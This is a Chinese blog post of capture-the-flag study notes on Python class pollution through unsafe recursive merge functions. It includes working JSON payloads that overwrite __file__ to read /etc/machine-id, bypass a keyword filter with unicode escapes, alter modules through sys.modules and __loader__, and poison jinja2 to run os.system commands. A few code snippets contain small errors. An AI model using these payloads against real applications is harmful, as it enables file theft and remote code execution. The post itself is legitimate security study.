在校赛里我遇到了有关python原型链污染的题目,虽然做了出来但是我个人认为我对这个的了解还是不够的,所以我会写下这篇文章来记录我学习python原型链污染的全部过程

python原型链污染的成因

python其实是没有原型这一说法的,只有子类继承父类。但是其继承关系和js的原型比较相似,这也就导致了python也存在与js相似的漏洞(python原型链污染)
python原型链污染的主要成因也与js相似都是因为merge这个合并函数错误的将base等当成了键值导致其父类被添加了属性,或者被修改了属性的值而导致的污染。
下面是一个python的合并函数

1
2
3
4
5
6
7
8
9
10
11
12
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):#判断dst中是否含有魔术方法__getitem__
if dst.get(k) and type(v) == dict:#判断dst[k]是否存在,且内容v是否为字典
merge(v, dst.get(k))#递归合并
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:#判断dst中是否有k这个属性且v为字典
merge(v, getattr(dst, k))#递归合并
else:
setattr(dst, k, v)#如果dst中既没有对应的键 k,也没有与键 k 同名的属性,则直接使用 setattr 将属性 k 设置为值 v。

上面的合并函数对传入的键值并没有做好过滤这也就导致了污染的可能。
我们可以用一个实例来解释
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
class F:
a="hehe"
class S_1(F):
pass
class S_2(F):
a="benben"

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
#// 递归合并函数,将dst字典内的数据合并至sec内


instance = S_1()
instance2=S_2()
payload = {
"__class__": {
"__base__":
{"a": "lalalala"}

}
}
F2=F_2()
print(instance.__class__.__base__)
print(instance.a)
merge(payload,instance)
print(instance.a)

1
2
hehe
lalalala

我们可以看到其输出的值有hehe变成了lalalala这就时候其父类被修改的结果
我们可以使用动态调试查看去是在哪里发生了污染。

在我们调试到最后一步即v不为字典为一个值时发生了污染,这主要是因为这个函数是使用了递归调用。在最后一步setattr(dst, k, v)时跳出了递归,一步步的回去最终污染到了父类(递归说实话还是有点抽象的)。
未进入递归

第一次递归

第二次递归

这几次递归最终执行的结果与下面的结果等价
1
instance.__class__.__base__.a=lalalala

这使得instance的父类中的属性a被修改造成了污染。

Object无法被污染

python原型链的污染和js还是有所区别的,在js中我们可以污染到object可是python并不行。我们用下面的实例来进行讲解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
class F:
a="hehe"
class S_1(F):
pass
class S_2(F):
a="benben"

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
#// 递归合并函数,将dst字典内的数据合并至sec内


instance = S_1()
instance2=S_2()
payload = {
"__class__":
{"__base__":
{"__base__":
{"a":"lalala"}
}
}
}
F2=F_2()
print(instance.__class__.__base__)
print(instance.a)
merge(payload,instance)
print(instance.a)

我们给上面的payload进行更改多加一个base尝试污染其父类的父类即object。在运行时便发生了报错
1
cannot set 'a' attribute of immutable type 'object'

“无法设置不可变类型 ‘object’ 的 ‘a’ 属性。”
尝试给 Python 中的 object 类型的一个实例添加一个名为 ‘a’ 的属性,但是 object 类型是不可变的,因此不能直接给它添加属性。

全局变量的污染(通过init等对全局变量进行污染进行污染)

首先我们需要了解什么时__init__
在Python中,__init__ 是一个特殊的方法(也称为魔术方法或双下划线方法),用于初始化新创建的对象实例。当你创建一个类的实例时,__init__方法会自动被调用,允许你为对象的属性设置初始值。如果你想要自定义对象的初始化过程,你可以重写(或称为覆盖)这个方法。
在python中,函数或者类方法
对于类的内置方法比如__init__这些来说,内置方法在并未重写时其数据类型为装饰器wrapperdescripptor,只有在重写之后才是函数function
在被重写时其具有__globals__属性,这个属性将函数或者类方法所申明的变量空间的全局变量通过字典的形式返回

1
2
3
4
5
6
7
8
def la():
pass
class A:
def __init__(self):
pass
print(A.__init__.__globals__)
print(la.__globals__)
print(A.__init__.__globals__==la.__globals__)

我们可以看到在类中重写的__init__与函数la的__globals__相同即__init__.__globals__其返回的为改py文件的全局变量空间,即我们可以利用这个来污染所有在改文件下定义的变量
我这里使用校题来进行讲解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
import uuid
from flask import Flask, request, session
from secret import black_list
import json


'''
@Author: hey
@message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.
* Th3_w0r1d_of_c0d3_1s_be@ut1ful_ but_y0u_c@n’t_c0mp1l3_love.
'''

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def cannot_be_bypassed(data):
for i in black_list:
if i in data:
return False
return True

def magicallllll(src, dst):
if hasattr(dst, '__getitem__'):
for key in src:
if isinstance(src[key], dict):
if key in dst and isinstance(src[key], dict):
magicallllll(src[key], dst[key])
else:
dst[key] = src[key]
else:
dst[key] = src[key]
else:
for key, value in src.items() :
if hasattr(dst,key) and isinstance(value, dict):
magicallllll(value,getattr(dst, key))
else:
setattr(dst, key, value)

class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False

Users = []
@app.route('/user/register',methods=['POST'])
def register():
if request.data:
try:
if not cannot_be_bypassed(request.data):
return "Hey bro,May be you should check your inputs,because it contains malicious data,Please don't hack me~~~ :) :) :)"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Ohhhhhhh,The username or password is incorrect,Please re-register!!!"
User = user()
magicallllll(data, User)
Users.append(User)
except Exception:
return "Ohhhhhhh,The username or password is incorrect,Please re-register!!!"
return "Congratulations,The username and password is correct,Register Success!!!"
else:
return "Ohhhhhhh,The username or password is incorrect,Please re-register!!!"

@app.route('/user/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "The username or password is incorrect,Login Failed,Please log in again!!!"
for user in Users:
if user.cannot_be_bypassed(data):
session["username"] = data["username"]
return "Congratulations,The username and password is correct,Login Success!!!"
except Exception:
return "The username or password is incorrect,Login Failed,Please log in again!!!"
return "Hey bro,May be you should check your inputs,because it contains malicious data,Please don't hack me~~~ :) :) :)"

@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

if __name__ == "__main__":

我们可以看到其在/路由下打开了__file__我们可以尝试污染这个__file__属性,在登陆页面调用了合并函数,这也就导致了有污染的入口。我们在看一下会发现其将__init__进行了重写这也就导致了我们可以使用__init__.__globals__来污染全局变量,即__file__
正常注册时我们传的json表单应该为
1
{"username":"1","password":"2"}

这并没有什么问题,但是我们可以在上面加点小东西。即可以利用{"__init__":{"__globals__":{"__file__":"要修改的文件路径"}}}来进行污染
payload
1
{"username":"1","password":"2","__init__":{"__globals__":{"__file__":"要修改的文件路径"}}}

由于这题加了waf所以我们可以使用unicode绕过。
1
{"username":1,"password":2,"\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F":{      "\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f":{"\u005f\u005f\u0066\u0069\u006c\u0065\u005f\u005f":   "/etc/machine-id"}},"ykg6xtt2j2l":"="}

其他模块的污染

这次的校赛并没有打到对于其他的他模块的变量的污染。可见学长还是手下留了情。
在全局变量的前提下,是我们都在入口文件中的类对象或者属性来进行操作的,但是如果我们操作的位置在入口文件中,而目标对象并不在入口文件当中,这时候我们就需要对其他加载过的模块来获取了

import加载获取:

一般python都是通过import来对模块进行导入的,那么我门要污染improt导入的对象只需要重新定向即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import DEMO
class F:
def __init__:
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
#// 递归合并函数,将dst字典内的数据合并至sec内
merge(payload,instance)

DEMO
1
2
b=1
print(b)

像上面的python代码导入了应该DEMO那么我们该如何对DEMO里的变量进行污染呢?很简单只要做一个重定向即可了。
payload
1
2
3
4
5
6
7
8

{"__init__":
{"__globals__":
{"DEMO":
{"b":2}
}
}
}


可以看到在我们运行后输出值变为了2,这就是因为我们先获取了全局变量,在修改DEMO中的值,将b修改为2.

sys模块加载获取:

在许多的环境中导入模块并不是简单的利用import进行导入同级目录下的文件,更多的是利用第三方模块和内置模块进行导入。这时候我们就无法简单的利用上面的payload进行重定向了,我们需要使用sys这个模块进行定向。
sys模块中有一个modules属性,这个属性可以加详细这个程序运行时导入的所有模块。所有我们可以通过他来进行重定向。

实例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import DEMO
import sys
class A:
def __init__(self):
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
#// 递归合并函数,将dst字典内的数据合并至sec内
print(DEMO.a)
instance =A()
payload={"__init__":{"__globals__":{"sys":{"modules":{"DEMO":{"a":2}}}}}}
merge(payload,instance)
print(DEMO.a)

可以看到我们的payload时先定位到sys模块的modules属性再修改DEMO的内容。

1
{"__init__":{"__globals__":{"sys":{"modules":{"DEMO":{"a":2}}}}}}

获取sys模块

我们知道了可以使用sys模块来重定位,但是我相信我们都有一个疑问就是如何获取sys模块。

通过加载器loader获取sys

我们可以通过loader加载器来获取sys模块的
loader加载器在python中的作用是为实现模块加载而设计的类,其在importlib这一内置模块中有具体实现。而importlib模块下所有的py文件中均引入了sys模块,这样我们和上面的sys模块获取已加载模块就联系起来了,所以我们的目标就变成了只要获取了加载器loader,我们就可以通过loader.__init__.__globals__['sys']来获取到sys模块,然后再获取到我们想要的模块。
那么现在我们的问题就是如何获取loader模块。
在Python中,loader是一个内置的属性,包含了加载模块的loader对象,Loader对象负责创建模块对象,通过loader属性,我们可以获取到加载特定模块的loader对象。
loader获取到sys

1
2
1.<模块名>.__spec__.__init__.__globals__['sys']获取到sys模块
2.<模块名>.__spec__.loader.__init__.__globals__['sys']

这个文章写的我是有点头疼的,对python的了解太少了,导致许多方法和属性搞不清楚,而且这个漏洞的概念也很多,头疼

滴滴2024年11月20日写下的笔记

很久之前就知道了原型链污染其实也是可以进行命令执行的,但一直没有记这个笔记.今天在研究一些新东西,看着看着就看到原型链污染了.想了想就来记一下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"__init__": {
"__globals__": {
"__loader__": {
"__init__": {
"__globals__": {
"sys": {
"modules": {
"jinja2": {
"runtime": {
"exported": ["*;__import__('os').system('dir');#"]
}
}
}
}
}
}
}
}
}
}

通过原型链污染来污染jinja2模板内的
复现代码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from flask import Flask,request,render_template
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(request.json, instance)
return render_template("index.html")

app.run(host="0.0.0.0")


我们需要在第一次模板渲染前就对其进行污染,才可以进行命令执行

不准备特别详细的记因为这些大佬的blog里其已经写的很清楚了

https://tttang.com/archive/1876/#toc_jinja_1